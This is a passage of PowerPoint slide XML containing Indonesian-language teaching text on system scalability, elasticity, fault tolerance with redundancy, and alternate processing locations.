              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ganda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lipat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paralel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Elastisitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real time. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elastisitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penurunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiba-tiba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Redundansi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hampir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pulih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lokasi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Lokasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Lokasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
